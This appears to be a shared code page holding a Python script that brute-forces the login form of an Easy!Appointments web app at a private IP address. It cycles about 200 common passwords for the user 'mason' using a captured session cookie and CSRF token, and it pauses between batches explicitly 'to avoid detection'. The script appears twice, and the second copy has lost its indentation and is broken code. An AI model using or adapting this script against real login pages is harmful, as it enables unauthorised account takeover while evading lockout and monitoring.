0xHamy/easy_appointments_bruteforce.py Secret

## easy_appointments_bruteforce.py
import requests, time

# Over 200 passwords
passwords = ['123456', '123456789', 'picture1', 'password', '12345678', '111111', '123123', '12345', '1234567890', 'senha', '1234567',
    'qwerty', 'abc123', 'Million2', '000000', '1234', 'iloveyou', 'aaron431', 'password1', 'qqww1122', '123', 'omgpop', '123321', '654321',
    'qwertyuiop', 'qwer123456', '123456a', 'a123456', '666666', 'asdfghjkl', 'ashley', '987654321', 'unknown', 'zxcvbnm', '112233', 'chatbooks',
    '20100728', '123123123', 'princess', 'jacket025', 'evite', '123abc', 'administrator', 'sunshine', '121212', 'dragon', '1q2w3e4r', '5201314', '159753',
    'pokemon', 'qwerty123', 'Bangbang123', 'jobandtalent', 'monkey', '1qaz2wsx', 'abcd1234', 'default', 'aaaaaa', 'soccer', '123654', 'ohmnamah23',
    '12345678910', 'zing', 'shadow', '102030', '11111111', 'asdfgh', '147258369', 'qazwsx', 'qwe123', 'michael', 'football', 'baseball', '1q2w3e4r5t',
    'party', 'daniel', 'asdasd', '222222', 'myspace1', 'asd123', '555555', 'a123456789', '888888', '7777777', 'berlin', '1234qwer', 'superman',
    '147258', '999999', '159357', 'love123', 'tigger', 'purple', 'samantha', 'charlie', 'babygirl', '88888888', 'jordan23', '789456123', 'jordan',
    'anhyeuem', 'killer', 'basketball', 'michelle', '1q2w3e', 'lol123', 'qwerty1', '789456', '6655321', 'nicole', 'naruto', 'master', 'chocolate',
    'qwerty', 'abc123', 'Million2', '000000', '1234', 'iloveyou', 'mule', 'aaron431', 'password1', 'qqww1122', '123', 'omgpop', '123321', '654321',
    'qwertyuiop', 'qwer123456', '123456a', 'a123456', '666666', 'asdfghjkl', 'ashley', '987654321', 'unknown', 'zxcvbnm', '112233', 'chatbooks',
    '20100728', '123123123', 'princess', 'jacket025', 'evite', '123abc', '123qwe', 'sunshine', '121212', 'dragon', '1q2w3e4r', '5201314', '159753',
    'pokemon', 'qwerty123', 'Bangbang123', 'jobandtalent', 'monkey', '1qaz2wsx', 'abcd1234', 'default', 'aaaaaa', 'soccer', '123654', 'ohmnamah23',
    'anhyeuem', 'killer', 'basketball', 'michelle', '1q2w3e', 'lol123', 'qwerty1', '789456', '6655321', 'nicole', 'naruto', 'master', 'chocolate',
    'maggieown', 'computer', 'hannah', 'jessica', '123456789a', 'password123', 'hunter', '686584', 'iloveyou1', 'justin', 'cookie', 'hello', 'blink182',
    'andrew', '25251325', 'love', '987654', 'bailey', 'donkey', 'princess1', '101010', '12341234', 'a801016']


# URL and headers
url = "http://10.0.0.94/index.php/login/validate"
headers = {
    "Cookie": "csrf_cookie=a17b571d5a5586fdf1a198f6b6e2421a; ea_session=aefe4084c5993d6fc81e84d438bf59c89752b954",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
    "Accept": "*/*",
    "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
}

# Loop through the passwords
for index, password in enumerate(passwords):
    data = {
        "csrf_token": "a17b571d5a5586fdf1a198f6b6e2421a",
        "username": "mason",
        "password": password.strip(),
    }

    # Send the POST request
    response = requests.post(url, headers=headers, data=data)

    # Check the response
    if not "Invalid credentials provided, please try again." in response.text:
        print(f"[ {index} ] Login succeeded with password: {password.strip()}")
        break
    else:
        print(f"[ {index} ] Invalid password: {password.strip()}")

    # Sleep for 10 seconds after every 8 attempts
    if (index + 1) % 8 == 0:
        print("[ * ] Pausing for 10 seconds to avoid detection...")
        time.sleep(10)
	import requests, time

	# Over 200 passwords
	passwords = ['123456', '123456789', 'picture1', 'password', '12345678', '111111', '123123', '12345', '1234567890', 'senha', '1234567',
	'qwerty', 'abc123', 'Million2', '000000', '1234', 'iloveyou', 'aaron431', 'password1', 'qqww1122', '123', 'omgpop', '123321', '654321',
	'qwertyuiop', 'qwer123456', '123456a', 'a123456', '666666', 'asdfghjkl', 'ashley', '987654321', 'unknown', 'zxcvbnm', '112233', 'chatbooks',
	'20100728', '123123123', 'princess', 'jacket025', 'evite', '123abc', 'administrator', 'sunshine', '121212', 'dragon', '1q2w3e4r', '5201314', '159753',
	'pokemon', 'qwerty123', 'Bangbang123', 'jobandtalent', 'monkey', '1qaz2wsx', 'abcd1234', 'default', 'aaaaaa', 'soccer', '123654', 'ohmnamah23',
	'12345678910', 'zing', 'shadow', '102030', '11111111', 'asdfgh', '147258369', 'qazwsx', 'qwe123', 'michael', 'football', 'baseball', '1q2w3e4r5t',
	'party', 'daniel', 'asdasd', '222222', 'myspace1', 'asd123', '555555', 'a123456789', '888888', '7777777', 'berlin', '1234qwer', 'superman',
	'147258', '999999', '159357', 'love123', 'tigger', 'purple', 'samantha', 'charlie', 'babygirl', '88888888', 'jordan23', '789456123', 'jordan',
	'anhyeuem', 'killer', 'basketball', 'michelle', '1q2w3e', 'lol123', 'qwerty1', '789456', '6655321', 'nicole', 'naruto', 'master', 'chocolate',
	'qwerty', 'abc123', 'Million2', '000000', '1234', 'iloveyou', 'mule', 'aaron431', 'password1', 'qqww1122', '123', 'omgpop', '123321', '654321',
	'qwertyuiop', 'qwer123456', '123456a', 'a123456', '666666', 'asdfghjkl', 'ashley', '987654321', 'unknown', 'zxcvbnm', '112233', 'chatbooks',
	'20100728', '123123123', 'princess', 'jacket025', 'evite', '123abc', '123qwe', 'sunshine', '121212', 'dragon', '1q2w3e4r', '5201314', '159753',
	'pokemon', 'qwerty123', 'Bangbang123', 'jobandtalent', 'monkey', '1qaz2wsx', 'abcd1234', 'default', 'aaaaaa', 'soccer', '123654', 'ohmnamah23',
	'anhyeuem', 'killer', 'basketball', 'michelle', '1q2w3e', 'lol123', 'qwerty1', '789456', '6655321', 'nicole', 'naruto', 'master', 'chocolate',
	'maggieown', 'computer', 'hannah', 'jessica', '123456789a', 'password123', 'hunter', '686584', 'iloveyou1', 'justin', 'cookie', 'hello', 'blink182',
	'andrew', '25251325', 'love', '987654', 'bailey', 'donkey', 'princess1', '101010', '12341234', 'a801016']


	# URL and headers
	url = "http://10.0.0.94/index.php/login/validate"
	headers = {
	"Cookie": "csrf_cookie=a17b571d5a5586fdf1a198f6b6e2421a; ea_session=aefe4084c5993d6fc81e84d438bf59c89752b954",
	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
	"Accept": "/",
	"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
	"Accept-Encoding": "gzip, deflate, br",
	"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
	"X-Requested-With": "XMLHttpRequest",
	}

	# Loop through the passwords
	for index, password in enumerate(passwords):
	data = {
	"csrf_token": "a17b571d5a5586fdf1a198f6b6e2421a",
	"username": "mason",
	"password": password.strip(),
	}

	# Send the POST request
	response = requests.post(url, headers=headers, data=data)

	# Check the response
	if not "Invalid credentials provided, please try again." in response.text:
	print(f"[ {index} ] Login succeeded with password: {password.strip()}")
	break
	else:
	print(f"[ {index} ] Invalid password: {password.strip()}")

	# Sleep for 10 seconds after every 8 attempts
	if (index + 1) % 8 == 0:
	print("[ * ] Pausing for 10 seconds to avoid detection...")
	time.sleep(10)